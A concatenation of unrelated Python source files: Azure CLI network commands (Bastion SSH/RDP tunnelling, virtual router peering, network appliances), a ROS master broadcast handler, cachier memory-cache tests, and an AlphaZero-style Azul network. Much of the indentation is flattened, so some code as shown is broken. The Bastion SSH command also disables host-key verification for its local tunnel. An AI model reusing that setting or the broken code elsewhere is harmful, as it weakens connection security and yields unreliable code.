return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def delete_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except: # pylint: disable=bare-except
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.begin_delete(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_delete(resource_group_name, virtual_hub_name, bgp_conn_name)
# endregion
# region service aliases
def list_service_aliases(cmd, location, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).available_service_aliases
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name, location=location)
return client.list(location=location)
# endregion
# region bastion
def create_bastion_host(cmd, resource_group_name, bastion_host_name, virtual_network_name,
public_ip_address, location=None, subnet='AzureBastionSubnet', scale_units=None, sku=None, tags=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
(BastionHost,
BastionHostIPConfiguration,
SubResource) = cmd.get_models('BastionHost',
'BastionHostIPConfiguration',
'SubResource')
ip_config_name = "bastion_ip_config"
ip_configuration = BastionHostIPConfiguration(name=ip_config_name,
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip_address))
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
tags=tags)
if cmd.supported_api_version(min_api='2021-03-01'):
sku_type = cmd.get_models('Sku')
sku = sku_type(name=sku)
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
scale_units=scale_units,
sku=sku,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
bastion_host_name=bastion_host_name,
parameters=bastion_host)
def list_bastion_host(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
SSH_EXTENSION_NAME = 'ssh'
SSH_EXTENSION_MODULE = 'azext_ssh.custom'
SSH_EXTENSION_VERSION = '0.1.3'
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _test_extension(extension_name):
from azure.cli.core.extension import (get_extension)
from pkg_resources import parse_version
ext = get_extension(extension_name)
if parse_version(ext.version) < parse_version(SSH_EXTENSION_VERSION):
raise CLIError('SSH Extension (version >= "{}") must be installed'.format(SSH_EXTENSION_VERSION))
def _get_ssh_path(ssh_command="ssh"):
import os
ssh_path = ssh_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
is_32bit = arch_data[0] == '32bit'
sys_path = 'SysNative' if is_32bit else 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
ssh_path = os.path.join(system32_path, "openSSH", (ssh_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run ssh from path %s", ssh_path)
if not os.path.isfile(ssh_path):
raise CLIError("Could not find " + ssh_command + ".exe. Is the OpenSSH client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return ssh_path
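# Illustrative note (not part of the CLI): on 64-bit Windows with a 64-bit Python this
# typically resolves to C:\Windows\System32\openSSH\ssh.exe; a 32-bit Python process
# goes through SysNative instead so the WOW64 redirector still reaches the native
# OpenSSH client.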
def _get_rdp_path(rdp_command="mstsc"):
import os
rdp_path = rdp_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
sys_path = 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
rdp_path = os.path.join(system32_path, (rdp_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run rdp from path %s", rdp_path)
if not os.path.isfile(rdp_path):
raise CLIError("Could not find " + rdp_command + ".exe. Is the rdp client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return rdp_path
def _get_host(username, ip):
return username + "@" + ip
def _build_args(cert_file, private_key_file):
private_key = []
certificate = []
if private_key_file:
private_key = ["-i", private_key_file]
if cert_file:
certificate = ["-o", "CertificateFile=" + cert_file]
return private_key + certificate
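# Illustrative sketch only (the paths below are hypothetical):
#     _build_args(None, '/home/user/.ssh/id_rsa')
#         -> ['-i', '/home/user/.ssh/id_rsa']
#     _build_args('/tmp/id_rsa-cert.pub', '/home/user/.ssh/id_rsa')
#         -> ['-i', '/home/user/.ssh/id_rsa', '-o', 'CertificateFile=/tmp/id_rsa-cert.pub']
# The resulting option list is appended to the ssh command assembled in ssh_bastion_host below.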
def ssh_bastion_host(cmd, auth_type, target_resource_id, resource_group_name, bastion_host_name, resource_port=None, username=None, ssh_key=None):
_test_extension(SSH_EXTENSION_NAME)
if not resource_port:
resource_port = 22
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
if auth_type.lower() == 'password':
if username is None:
raise RequiredArgumentMissingError("Please enter username with --username.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
elif auth_type.lower() == 'aad':
azssh = _get_azext_module(SSH_EXTENSION_NAME, SSH_EXTENSION_MODULE)
public_key_file, private_key_file = azssh._check_or_create_public_private_files(None, None) # pylint: disable=protected-access
cert_file, username = azssh._get_and_write_certificate(cmd, public_key_file, private_key_file + '-cert.pub') # pylint: disable=protected-access
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(cert_file, private_key_file)
elif auth_type.lower() == 'ssh-key':
if username is None or ssh_key is None:
raise RequiredArgumentMissingError("Please enter username --username and ssh cert location --ssh-key.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(None, ssh_key)
else:
raise UnrecognizedArgumentError("Unknown auth type. Use one of password, aad or ssh-key.")
command = command + ["-p", str(tunnel_server.local_port)]
command = command + ['-o', "StrictHostKeyChecking=no", '-o', "UserKnownHostsFile=/dev/null"]
command = command + ['-o', "LogLevel=Error"]
logger.debug("Running ssh command %s", ' '.join(command))
try:
subprocess.call(command, shell=platform.system() == 'Windows')
except Exception as ex:
raise CLIInternalError(ex)
def rdp_bastion_host(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port=None):
if not resource_port:
resource_port = 3389
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
if platform.system() == 'Windows':
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
command = [_get_rdp_path(), "/v:localhost:{0}".format(tunnel_server.local_port)]
logger.debug("Running rdp command %s", ' '.join(command))
from ._process_helper import launch_and_wait
launch_and_wait(command)
tunnel_server.cleanup()
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
def get_tunnel(cmd, resource_group_name, name, vm_id, resource_port, port=None):
from .tunnel import TunnelServer
client = network_client_factory(cmd.cli_ctx).bastion_hosts
bastion = client.get(resource_group_name, name)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
tunnel_server = TunnelServer(cmd.cli_ctx, 'localhost', port, bastion, vm_id, resource_port)
return tunnel_server
def create_bastion_tunnel(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port, port, timeout=None):
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port, port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
# endregion
# region security partner provider
def create_security_partner_provider(cmd, resource_group_name, security_partner_provider_name,
security_provider_name, virtual_hub, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
SecurityPartnerProvider, SubResource = cmd.get_models('SecurityPartnerProvider', 'SubResource')
security_partner_provider = SecurityPartnerProvider(security_provider_name=security_provider_name,
virtual_hub=SubResource(id=virtual_hub),
location=location,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
security_partner_provider_name=security_partner_provider_name,
parameters=security_partner_provider)
def update_security_partner_provider(instance, cmd, security_provider_name=None, virtual_hub=None, tags=None):
with cmd.update_context(instance) as c:
c.set_param('security_provider_name', security_provider_name)
c.set_param('virtual_hub', virtual_hub)
c.set_param('tags', tags)
return instance
def list_security_partner_provider(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
# endregion
# region network gateway connection
def reset_shared_key(cmd, client, virtual_network_gateway_connection_name, key_length, resource_group_name=None):
ConnectionResetSharedKey = cmd.get_models('ConnectionResetSharedKey')
shared_key = ConnectionResetSharedKey(key_length=key_length)
return client.begin_reset_shared_key(resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name, # pylint: disable=line-too-long
parameters=shared_key)
def update_shared_key(cmd, instance, value):
with cmd.update_context(instance) as c:
c.set_param('value', value)
return instance
# endregion
# region network virtual appliance
def create_network_virtual_appliance(cmd, client, resource_group_name, network_virtual_appliance_name,
vendor, bundled_scale_unit, market_place_version,
virtual_hub, boot_strap_configuration_blobs=None,
cloud_init_configuration_blobs=None,
cloud_init_configuration=None, asn=None,
location=None, tags=None, no_wait=False):
(NetworkVirtualAppliance,
SubResource,
VirtualApplianceSkuProperties) = cmd.get_models('NetworkVirtualAppliance',
'SubResource',
'VirtualApplianceSkuProperties')
virtual_appliance = NetworkVirtualAppliance(boot_strap_configuration_blobs=boot_strap_configuration_blobs,
cloud_init_configuration_blobs=cloud_init_configuration_blobs,
cloud_init_configuration=cloud_init_configuration,
virtual_appliance_asn=asn,
virtual_hub=SubResource(id=virtual_hub),
nva_sku=VirtualApplianceSkuProperties(
vendor=vendor,
bundled_scale_unit=bundled_scale_unit,
market_place_version=market_place_version
),
location=location,
tags=tags)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, virtual_appliance)
def update_network_virtual_appliance(instance, cmd, cloud_init_configuration=None, asn=None):
with cmd.update_context(instance) as c:
c.set_param('virtual_appliance_asn', asn)
c.set_param('cloud_init_configuration', cloud_init_configuration)
return instance
def list_network_virtual_appliance(cmd, client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def create_network_virtual_appliance_site(cmd, client, resource_group_name, network_virtual_appliance_name,
site_name, address_prefix, allow=None, optimize=None, default=None,
no_wait=False):
(BreakOutCategoryPolicies,
Office365PolicyProperties,
VirtualApplianceSite) = cmd.get_models('BreakOutCategoryPolicies',
'Office365PolicyProperties',
'VirtualApplianceSite')
virtual_appliance_site = VirtualApplianceSite(address_prefix=address_prefix,
o365_policy=Office365PolicyProperties(
break_out_categories=BreakOutCategoryPolicies(
allow=allow,
optimize=optimize,
default=default
)))
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, site_name, virtual_appliance_site)
def update_network_virtual_appliance_site(instance, cmd, address_prefix, allow=None, optimize=None, default=None):
with cmd.update_context(instance) as c:
c.set_param('address_prefix', address_prefix)
c.set_param('o365_policy.break_out_categories.allow', allow)
c.set_param('o365_policy.break_out_categories.optimize', optimize)
c.set_param('o365_policy.break_out_categories.default', default)
return instance
# endregion
|
broadcast_handler.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2017, The Apollo Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Revision $Id$
import os
import json
import time
import socket
import struct
import decimal
import logging
import traceback
import threading
import functools
import rospy.core
from rospy.core import signal_shutdown
from rospy.impl.registration import Registration
from rospy.impl.registration import get_topic_manager
from rospy.impl.registration import get_service_manager
from rospy.impl.registration import get_node_handler
from rosgraph.network import parse_http_host_and_port, get_host_name
import sys
env = os.environ.get('LD_LIBRARY_PATH', '')
for sub_path in env.split(':'):
    if sub_path:
        sys.path.append(sub_path)
from rospy.impl import participant
TIMESTAMP = 'timestamp'
NODE_NAME = 'node_name'
XMLRPC_URI = 'xmlrpc_uri'
REQUEST_TYPE = 'request_type'
NODE_TIME = "node_time"
TOPIC_NAME = "topic_name"
TOPIC_TYPE = "topic_type"
TOPIC_URI = "topic_uri"
SERVICE_NAME = "service_name"
SERVICE_TYPE = "service_type"
SERVICE_URI = "service_uri"
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
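# Illustrative sketch (the class below is hypothetical and only demonstrates the pattern):
# declaring Singleton as the metaclass makes every construction return one shared
# instance, which is how BroadcastHandler below guarantees a single listener per process.
#
#     class _Registry(object):
#         __metaclass__ = Singleton   # Python 2 metaclass syntax, as used in this file
#
#     _Registry() is _Registry()      # -> True, both calls yield the same object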
def byteify(input):
"""
Convert unicode to str.
"""
if isinstance(input, dict):
return {byteify(key): byteify(value) for key, value in input.iteritems()}
elif isinstance(input, list):
return [byteify(element) for element in input]
elif isinstance(input, unicode):
return input.encode('utf-8')
else:
return input
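# Illustrative sketch (field values are hypothetical): under Python 2, json.loads yields
# unicode keys and values, so byteify is applied via object_hook when the broadcast
# payload is decoded in _unpack_msg below, e.g.
#
#     byteify({u'request_type': u'registerPublisher', u'node_name': u'/talker'})
#     # -> {'request_type': 'registerPublisher', 'node_name': '/talker'}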
class BroadcastHandler(object):
"""
BroadcastHandler.
"""
__metaclass__ = Singleton
def __init__(self, handler):
"""
brief info for: __init__
"""
super(BroadcastHandler, self).__init__()
self._logger = logging.getLogger(__name__)
self._logger.setLevel(logging.INFO)
self.callback = ["registerPublisher",
"unregisterPublisher",
"registerSubscriber",
"unregisterSubscriber",
"registerService",
"unregisterService",
"lookupService",
"getTopicTypes",
"lookupNode",
]
self._handler = handler
self._name = "rosmaster"
self._participant = participant.Participant(self._name)
self._participant.init_py()
        self._broadcast_manager_thread = threading.Thread(
            target=self.run, args=())
        self._broadcast_manager_thread.setDaemon(True)
        self._broadcast_manager_thread.start()
def run(self):
"""
brief info for: thread run method
"""
self._logger.debug("starting broadcast_manager!")
while True:
try:
msg = self._participant.read_msg()
if msg is None:
continue
                if len(msg) > 0:
data = self._unpack_msg(msg.strip())
self._logger.debug("recv data: %s " % data)
try:
cb = '_' + data[REQUEST_TYPE] + "Callback"
func = getattr(self, cb)
func(data)
except AttributeError:
pass
else:
time.sleep(0.005)
except Exception as e:
self._logger.error("broadcast_manager thread error is %s" % e)
finally:
pass
def getUri(self, caller_id):
"""
getUri
"""
return 1, "", self._uri
def getPid(self, caller_id):
"""
Get the PID of this server
"""
return 1, "", os.getpid()
def _registerPublisherCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
datatype = data[TOPIC_TYPE]
uri = data[XMLRPC_URI]
self._handler.registerPublisher(name, topic, datatype, uri)
def _unregisterPublisherCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
uri = data[TOPIC_URI]
self._handler.unregisterPublisher(name, topic, uri)
def _registerSubscriberCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
datatype = data[TOPIC_TYPE]
uri = data[XMLRPC_URI]
self._handler.registerSubscriber(name, topic, datatype, uri)
def _unregisterSubscriberCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
uri = data[TOPIC_URI]
self._handler.unregisterSubscriber(name, topic, uri)
def _registerServiceCallback(self, data):
name = data[NODE_NAME]
service_name = data[SERVICE_NAME]
service_uri = data[SERVICE_URI]
uri = data[XMLRPC_URI]
self._handler.registerService(name, service_name, service_uri, uri)
def _unregisterServiceCallback(self, data):
name = data[NODE_NAME]
service_name = data[SERVICE_NAME]
service_uri = data[SERVICE_URI]
self._handler.unregisterService(name, service_name, service_uri)
def _send(self, data):
"""
brief info for: Get _master_handler internal dict stuct according to dict_type
"""
self._participant.send(data)
def _recv(self, size=1024):
"""
brief info for: Get _master_handler internal dict stuct according to dict_type
"""
msg = addr = None
try:
msg, addr = self._sock.recvfrom(size)
except Exception as e:
self._logger.error("socket recv error is %s" % e)
self._logger.error(traceback.format_exc())
finally:
pass
return msg, addr
def _unpack_msg(self, msg):
        data = None
        try:
            data = json.loads(msg, object_hook=byteify)
        except Exception as e:
            self._logger.error("parse json failed! %s" % e)
        return data
def _pack_msg(self, data):
return json.dumps(data)
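# Illustrative sketch of the expected wire format (field values are hypothetical):
# a registerPublisher broadcast is a JSON object such as
#     {"request_type": "registerPublisher", "node_name": "/talker",
#      "topic_name": "/chatter", "topic_type": "std_msgs/String",
#      "xmlrpc_uri": "http://host:12345/"}
# which _unpack_msg decodes and run() then dispatches to _registerPublisherCallback.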
|
test_memory_core.py
|
"""Test for the in-memory implementation of the Cachier python package."""
import hashlib
import queue
import threading
from datetime import timedelta
from random import random
from time import sleep, time
import pytest
import pandas as pd
from cachier import cachier
@cachier(backend='memory', next_time=False)
def _takes_2_seconds(arg_1, arg_2):
"""Some function."""
sleep(2)
return 'arg_1:{}, arg_2:{}'.format(arg_1, arg_2)
@pytest.mark.memory
def test_memory_core():
"""Basic memory core functionality."""
_takes_2_seconds.clear_cache()
_takes_2_seconds('a', 'b')
start = time()
_takes_2_seconds('a', 'b', verbose_cache=True)
end = time()
assert end - start < 1
_takes_2_seconds.clear_cache()
SECONDS_IN_DELTA = 3
DELTA = timedelta(seconds=SECONDS_IN_DELTA)
@cachier(backend='memory', stale_after=DELTA, next_time=False)
def _stale_after_seconds(arg_1, arg_2):
"""Some function."""
return random()
@pytest.mark.memory
def test_stale_after():
"""Testing the stale_after functionality."""
_stale_after_seconds.clear_cache()
val1 = _stale_after_seconds(1, 2)
val2 = _stale_after_seconds(1, 2)
val3 = _stale_after_seconds(1, 3)
assert val1 == val2
assert val1 != val3
sleep(3)
val4 = _stale_after_seconds(1, 2)
assert val4 != val1
_stale_after_seconds.clear_cache()
@cachier(backend='memory', stale_after=DELTA, next_time=True)
def _stale_after_next_time(arg_1, arg_2):
"""Some function."""
return random()
@pytest.mark.memory
def test_stale_after_next_time():
"""Testing the stale_after with next_time functionality."""
_stale_after_next_time.clear_cache()
val1 = _stale_after_next_time(1, 2)
val2 = _stale_after_next_time(1, 2)
val3 = _stale_after_next_time(1, 3)
assert val1 == val2
assert val1 != val3
sleep(SECONDS_IN_DELTA + 1)
val4 = _stale_after_next_time(1, 2)
assert val4 == val1
sleep(0.5)
val5 = _stale_after_next_time(1, 2)
assert val5 != val1
_stale_after_next_time.clear_cache()
@cachier(backend='memory')
def _random_num():
return random()
@cachier(backend='memory')
def _random_num_with_arg(a):
# print(a)
return random()
@pytest.mark.memory
def test_overwrite_cache():
"""Tests that the overwrite feature works correctly."""
_random_num.clear_cache()
int1 = _random_num()
int2 = _random_num()
assert int2 == int1
int3 = _random_num(overwrite_cache=True)
assert int3 != int1
int4 = _random_num()
assert int4 == int3
_random_num.clear_cache()
_random_num_with_arg.clear_cache()
int1 = _random_num_with_arg('a')
int2 = _random_num_with_arg('a')
assert int2 == int1
int3 = _random_num_with_arg('a', overwrite_cache=True)
assert int3 != int1
int4 = _random_num_with_arg('a')
assert int4 == int3
_random_num_with_arg.clear_cache()
@pytest.mark.memory
def test_ignore_cache():
"""Tests that the ignore_cache feature works correctly."""
_random_num.clear_cache()
int1 = _random_num()
int2 = _random_num()
assert int2 == int1
int3 = _random_num(ignore_cache=True)
assert int3 != int1
int4 = _random_num()
assert int4 != int3
assert int4 == int1
_random_num.clear_cache()
_random_num_with_arg.clear_cache()
int1 = _random_num_with_arg('a')
int2 = _random_num_with_arg('a')
assert int2 == int1
int3 = _random_num_with_arg('a', ignore_cache=True)
assert int3 != int1
int4 = _random_num_with_arg('a')
assert int4 != int3
assert int4 == int1
_random_num_with_arg.clear_cache()
@cachier(backend='memory')
def _takes_time(arg_1, arg_2):
"""Some function."""
sleep(2) # this has to be enough time for check_calculation to run twice
return random() + arg_1 + arg_2
def _calls_takes_time(res_queue):
res = _takes_time(0.13, 0.02)
res_queue.put(res)
@pytest.mark.memory
def test_memory_being_calculated():
"""Testing memory core handling of being calculated scenarios."""
_takes_time.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread1.start()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 == res2
@cachier(backend='memory', stale_after=timedelta(seconds=1), next_time=True)
def _being_calc_next_time(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
def _calls_being_calc_next_time(res_queue):
res = _being_calc_next_time(0.13, 0.02)
res_queue.put(res)
@pytest.mark.memory
def test_being_calc_next_time():
"""Testing memory core handling of being calculated scenarios."""
_takes_time.clear_cache()
_being_calc_next_time(0.13, 0.02)
sleep(1.1)
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_being_calc_next_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_being_calc_next_time, kwargs={'res_queue': res_queue})
thread1.start()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 == res2
@cachier(backend='memory')
def _bad_cache(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
@cachier(backend='memory')
def _delete_cache(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
@pytest.mark.memory
def test_clear_being_calculated():
"""Test memory core clear `being calculated` functionality."""
_takes_time.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread1.start()
_takes_time.clear_being_calculated()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 != res2
@pytest.mark.memory
def test_clear_being_calculated_with_empty_cache():
"""Test memory core clear `being calculated` functionality."""
_takes_time.clear_cache()
_takes_time.clear_being_calculated()
@cachier(backend='memory', stale_after=timedelta(seconds=1), next_time=True)
def _error_throwing_func(arg1):
if not hasattr(_error_throwing_func, 'count'):
_error_throwing_func.count = 0
_error_throwing_func.count += 1
if _error_throwing_func.count > 1:
raise ValueError("Tiny Rick!")
return 7
@pytest.mark.memory
def test_error_throwing_func():
res1 = _error_throwing_func(4)
sleep(1.5)
res2 = _error_throwing_func(4)
assert res1 == res2
@pytest.mark.memory
def test_callable_hash_param():
def _hash_params(args, kwargs):
def _hash(obj):
if isinstance(obj, pd.core.frame.DataFrame):
return hashlib.sha256(
pd.util.hash_pandas_object(obj).values.tobytes()
).hexdigest()
return obj
k_args = tuple(map(_hash, args))
k_kwargs = tuple(sorted(
{k: _hash(v) for k, v in kwargs.items()}.items()))
return k_args + k_kwargs
@cachier(backend='memory', hash_params=_hash_params)
def _params_with_dataframe(*args, **kwargs):
"""Some function."""
return random()
_params_with_dataframe.clear_cache()
df_a = pd.DataFrame.from_dict(dict(a=[0], b=[2], c=[3]))
df_b = pd.DataFrame.from_dict(dict(a=[0], b=[2], c=[3]))
value_a = _params_with_dataframe(df_a, 1)
value_b = _params_with_dataframe(df_b, 1)
assert value_a == value_b # same content --> same key
value_a = _params_with_dataframe(1, df=df_a)
value_b = _params_with_dataframe(1, df=df_b)
assert value_a == value_b # same content --> same key
if __name__ == '__main__':
test_memory_being_calculated()
|
alphazul.py
|
import numpy as np
import tensorflow as tf
import mcts
from multiprocessing import Process,Pipe,Queue
import azul
import time
import random
DTYPE = tf.float32
NUM_HIDDEN = 384
NUM_LAYER = 4
STATES_SIZE = 155
MASK_SIZE = 180
REGULARIZATION_FACTOR = 1e-4
LEARNING_RATE = 1e-3
BATCH_SIZE = 32
EPOCH = 10
class InferenceNetwork(object):
"""docstring for InferenceNetwork"""
def __init__(self, input_size, output_size, num_layer=NUM_LAYER, num_hidden = NUM_HIDDEN):
self._graph = tf.Graph()
with self._graph.as_default():
with tf.name_scope('input_layer'):
self._input_states = tf.placeholder(DTYPE, [None,input_size], 'input_states')
self._mask = tf.placeholder(DTYPE, [None,output_size], 'mask')
with tf.name_scope('labels'):
self._label_value = tf.placeholder(DTYPE, [None,1], 'label_value')
self._label_distribution = tf.placeholder(tf.int32, [None], 'label_distribution')
with tf.name_scope('MLP'):
layer_out = self._input_states
                for i in range(num_layer):
                    layer_out = tf.layers.dense(layer_out, num_hidden, tf.nn.relu, name='MLP_layer_{}'.format(i))
with tf.name_scope('value_header'):
self._prediction_value = tf.layers.dense(layer_out, 1, tf.nn.tanh, name='value_layer')
with tf.name_scope('distribution_header'):
logits = tf.layers.dense(layer_out, output_size, name='logits')
# logits_min = tf.reduce_min(logits, axis = 1)
# masked_min = (self._mask - 1.) * logits_min
# masked_logits = logits * self._mask - masked_min
# masked_max = tf.reduce_max(masked_logits,axis=1)
# self._prediction_distribution = tf.exp(logits-masked_max)*self._mask/tf.reduce_sum(tf.exp(masked_logits-masked_max)*self._mask,axis=1)
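                # Masking note: self._mask is 1 for legal moves and 0 otherwise;
                # adding (mask - 1) * tf.float32.max / 10 drives illegal logits to
                # a very large negative value so softmax assigns them ~0
                # probability (used here instead of -inf, which could produce NaNs).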
masked_logits = logits + (self._mask - 1.) * tf.float32.max / 10
self._prediction_distribution = tf.nn.softmax(masked_logits)
with tf.name_scope('losses'):
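                # Combined objective in the AlphaZero style: cross-entropy between
                # the masked policy logits and the MCTS-chosen action, MSE on the
                # game outcome, and L2 weight decay (biases excluded).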
self._policy_loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self._label_distribution, logits = masked_logits))
self._value_loss = tf.losses.mean_squared_error(labels=self._label_value, predictions=self._prediction_value)
self._reg_loss = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * REGULARIZATION_FACTOR
self._loss = self._policy_loss + self._value_loss + self._reg_loss
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE)
self._train_op = optimizer.minimize(self._loss)
init = tf.global_variables_initializer()
self._saver = tf.train.Saver()
self._sess = tf.Session(graph = self._graph)
try:
self.restore()
except ValueError as e:
print(e)
self._sess.run(init)
self.save()
writer = tf.summary.FileWriter("./tensorboard/log/", self._sess.graph)
writer.close()
def predict(self, input_states, mask):
feed_dict = {
self._input_states:input_states,
self._mask:mask,
}
value_p, distribution_p = self._sess.run([self._prediction_value,self._prediction_distribution],feed_dict=feed_dict)
return value_p, distribution_p
    def train(self, states, actions, values, masks):
feed_dict = {
self._input_states:states,
self._label_value:values,
            self._label_distribution:actions,
self._mask:masks
}
policy_loss,value_loss,reg_loss,loss,_ = self._sess.run([self._policy_loss,self._value_loss,self._reg_loss,self._loss,self._train_op],feed_dict=feed_dict)
print('\n')
